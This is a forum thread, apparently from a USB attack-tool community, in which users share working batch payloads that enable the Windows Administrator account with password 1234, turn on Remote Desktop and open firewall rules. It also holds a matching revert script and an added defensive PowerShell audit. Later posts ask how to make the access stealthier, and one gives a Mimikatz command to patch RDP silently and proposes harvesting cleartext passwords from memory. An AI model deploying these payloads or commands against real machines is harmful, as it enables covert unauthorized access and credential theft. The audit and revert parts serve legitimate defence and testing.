enable admin & rdp payload (Completed)


Vert


The idea is to enable the admin account and RDP and open the required ports. So far I have come up with this.

Batch file with the following script:

rem enable the built-in Administrator account
net user administrator /active:yes
rem show the account's current settings (no password is set by this line)
net user administrator
rem allow Remote Desktop connections (0 = allowed)
reg add "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server" /v fDenyTSConnections /t REG_DWORD /d 0 /f
rem start the Remote Desktop service now and on every boot
sc config TermService start= auto
net start TermService
rem open the firewall: legacy netsh syntax (XP/2003) and the current advfirewall syntax (Vista and later)
netsh firewall set service RemoteDesktop enable
netsh advfirewall firewall set rule group="remote desktop" new enable=Yes
exit

Then compile it as an exe so it can be run as admin from the Bunny.

I've also made a script to disable everything.

rem disable the built-in Administrator account
net user administrator /active:no
rem deny Remote Desktop connections (1 = denied)
reg add "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server" /v fDenyTSConnections /t REG_DWORD /d 1 /f
rem put the service back to manual start (the original had start= auto here, which would restart it on boot) and stop it now
sc config TermService start= demand
net stop TermService
rem close the firewall again (legacy and current syntax, as above)
netsh firewall set service RemoteDesktop disable
netsh advfirewall firewall set rule group="remote desktop" new enable=no
exit

I would note that this is just an idea and completely untested; the final step would simply be having the Bunny run the exe files.

I was also thinking it would be a good idea to dump the system's internal and external IP for later use.

Maybe someone wants to step in and complete this half-finished payload or add to it.

Edited by Vert (update)
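The enable script above changes four host settings and leaves a trail in the Security log. As an added example (not part of Vert's payload or this thread), here is a PowerShell audit a defender can run on a Windows 10 / Server 2016+ host to find that configuration: it checks each setting and looks for the account-enable, password-reset and RDP (Logon Type 10) events of the last 24 hours. The function name and the 24-hour window are my own choices; it needs an elevated prompt and the built-in LocalAccounts and NetSecurity modules.

```powershell
# Added example, not from the thread: audit the settings that enable.bat changes
# and the Security-log events those changes produce. Run from an elevated PowerShell.

function Get-RdpAdminExposure {
    $findings = @()

    # 1. Built-in Administrator (RID 500), the account "net user administrator /active:yes" enables
    $admin = Get-LocalUser | Where-Object { $_.SID.Value -like 'S-1-5-21-*-500' }
    if ($admin -and $admin.Enabled) {
        $findings += "Built-in Administrator '$($admin.Name)' is enabled; password last set $($admin.PasswordLastSet)"
    }

    # 2. fDenyTSConnections = 0 is the registry change that allows Remote Desktop connections
    $tsKey = 'HKLM:\SYSTEM\CurrentControlSet\Control\Terminal Server'
    $ts = Get-ItemProperty -Path $tsKey -Name fDenyTSConnections -ErrorAction SilentlyContinue
    if ($ts -and $ts.fDenyTSConnections -eq 0) {
        $findings += 'fDenyTSConnections = 0 (Remote Desktop connections allowed)'
    }

    # 3. TermService running or set to start automatically ("sc config TermService start= auto")
    $svc = Get-Service -Name TermService -ErrorAction SilentlyContinue
    if ($svc -and ($svc.StartType -eq 'Automatic' -or $svc.Status -eq 'Running')) {
        $findings += "TermService is $($svc.Status) with StartType $($svc.StartType)"
    }

    # 4. The "Remote Desktop" firewall rule group enabled on any profile
    $rules = Get-NetFirewallRule -DisplayGroup 'Remote Desktop' -ErrorAction SilentlyContinue |
             Where-Object { $_.Enabled -eq 'True' }
    if ($rules) {
        $findings += "Firewall group 'Remote Desktop': $(@($rules).Count) rule(s) enabled"
    }

    # 5. Security events of the last 24h: 4722 = account enabled, 4724 = password reset,
    #    4624 with Logon Type 10 = RemoteInteractive (RDP) logon
    $since = (Get-Date).AddHours(-24)
    $events = Get-WinEvent -FilterHashtable @{ LogName = 'Security'; Id = 4722, 4724, 4624; StartTime = $since } `
                           -ErrorAction SilentlyContinue
    foreach ($e in $events) {
        if ($e.Id -eq 4624 -and $e.Message -notmatch 'Logon Type:\s+10') { continue }
        $findings += "Event $($e.Id) at $($e.TimeCreated): $(($e.Message -split "`n")[0].Trim())"
    }

    return $findings
}

$result = Get-RdpAdminExposure
if ($result) { $result | ForEach-Object { Write-Warning $_ } } else { Write-Host 'No RDP/admin exposure found.' }
```

Each finding maps to one line of the batch file, so an empty result after running disable.bat is also a quick way to confirm the revert worked.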

Stole my idea. Well, mostly-ish.

My idea was to use PowerShell to enable RDP and then host a hotspot, so you could access the PC from away from the PC and control it remotely. It'd be nice to be able to control it without a user (if there is one) seeing (a separate user being used in the background that you can't see).

I'm in the later stages of testing the payload now. As is, it enables the admin account, puts a password of 1234 on it and enables RDP, with scripts to enable and disable it all. I'm in the last stage of getting the payload to run as admin.

#RDPADMIN

disable.bat

enable.bat

-------------------------------------------------------------------------------------

#ADMINENABLE

Figured I'd add another bat; this one simply enables the admin account with password 1234. Switch yes to no to disable again.

admin.bat

--------------------------------------------------------------------------------------

Edited by Vert (update)

Presenting 3 new bunny payloads:

Admin: enables admin account with password 1234

Adminrdp: enables admin with pass 1234 & RDP + ports

UNadminrdp: disables admin account & RDP + ports

UNadminrdp.rar

Adminrdp.rar

Admin.rar

I take no credit for these; I only mashed it all together and tested it.

My intended use for these was purely for making system repairs easier, and I take no responsibility for how they may be used.

Edited by Vert

39 minutes ago, Vert said:

Presenting 3 new bunny payloads:

Admin: enables admin account with password 1234

Adminrdp: enables admin with pass 1234 & RDP + ports

UNadminrdp: disables admin account & RDP + ports

UNadminrdp.rar

Adminrdp.rar

Admin.rar

I take no credit for these; I only mashed it all together and tested it.

My intended use for these was purely for making system repairs easier, and I take no responsibility for how they may be used.

I'll take a look at this. :)


The bat files posted above are the exact same as the compiled .exes in the final result, so if you would rather compile the bats yourself you're welcome to do so. It might even be possible to use the bat files rather than the .exes with some changes to the payload, but I did not test any of the payloads in this way.

Edited by Vert

When you connect over RDP it pops a 30 sec window saying OK or cancel that another user is logging in; it isn't very sneaky the way this is set up. If someone knows a better, sneakier method it could be interesting; as I noted, my intent was legit usage for system repairs. My testing was performed on 2 Windows 10 Pro systems, but I did add some older commands that should work with older versions of Windows as far back as XP; they remain untested.

Edited by Vert

4 minutes ago, Vert said:

When you connect over RDP it pops a 30 sec window saying OK or cancel that another user is logging in; it isn't very sneaky the way this is set up. If someone knows a better, sneakier method it could be interesting; as I noted, my intent was legit usage for system repairs.

Very nice. I actually never thought of the bunny/ducky in the context of legitimate uses. :grin:

I got a Bunny personally so I can demo to management what happens if I grant a non-IT user local admin perms like I sometimes get asked.

The Bunny is just an automation tool; it isn't good nor evil by itself, it's how you use it. Much like a hammer: most use it for putting in nails, but others have been known to cave in skulls with it. The person using a tool is its master; the tool is useless without you to control it.

Edited by Vert

You could potentially put third-party remote-desktop software on the PC and then tell the PC to run it in the background, then you can connect to it via a phone or laptop elsewhere (via the PC's hotspot or over the internet) using an app on your side.


3 hours ago, Vert said:

When you connect over RDP it pops a 30 sec window saying OK or cancel that another user is logging in; it isn't very sneaky the way this is set up. If someone knows a better, sneakier method it could be interesting; as I noted, my intent was legit usage for system repairs. My testing was performed on 2 Windows 10 Pro systems, but I did add some older commands that should work with older versions of Windows as far back as XP; they remain untested.

Vert,

Mimikatz can patch RDP services in real time to allow multiple users to connect, and I don't think it notifies the other user at all. It would be neat to run Mimikatz first if you've already got admin privs, extract users' cleartext passwords out of memory, and RDP as the same user to try to fly a bit more under the radar.

Invoke-Mimikatz -Command 'privilege::debug ts::multirdp exit'


3 minutes ago, redteamwynns said:

Vert,

Mimikatz can patch RDP services in real time to allow multiple users to connect, and I don't think it notifies the other user at all. It would be neat to run Mimikatz first if you've already got admin privs, extract users' cleartext passwords out of memory, and RDP as the same user to try to fly a bit more under the radar.

Invoke-Mimikatz -Command 'privilege::debug ts::multirdp exit'

Sounds interesting, and I welcome others to improve on what I started; it seems like a good jumping-off point / proof of concept.

Edited by Vert

1 hour ago, redteamwynns said:

Vert,

Mimikatz can patch RDP services in real time to allow multiple users to connect, and I don't think it notifies the other user at all. It would be neat to run Mimikatz first if you've already got admin privs, extract users' cleartext passwords out of memory, and RDP as the same user to try to fly a bit more under the radar.

Invoke-Mimikatz -Command 'privilege::debug ts::multirdp exit'

It does sound interesting. I'll look into that.
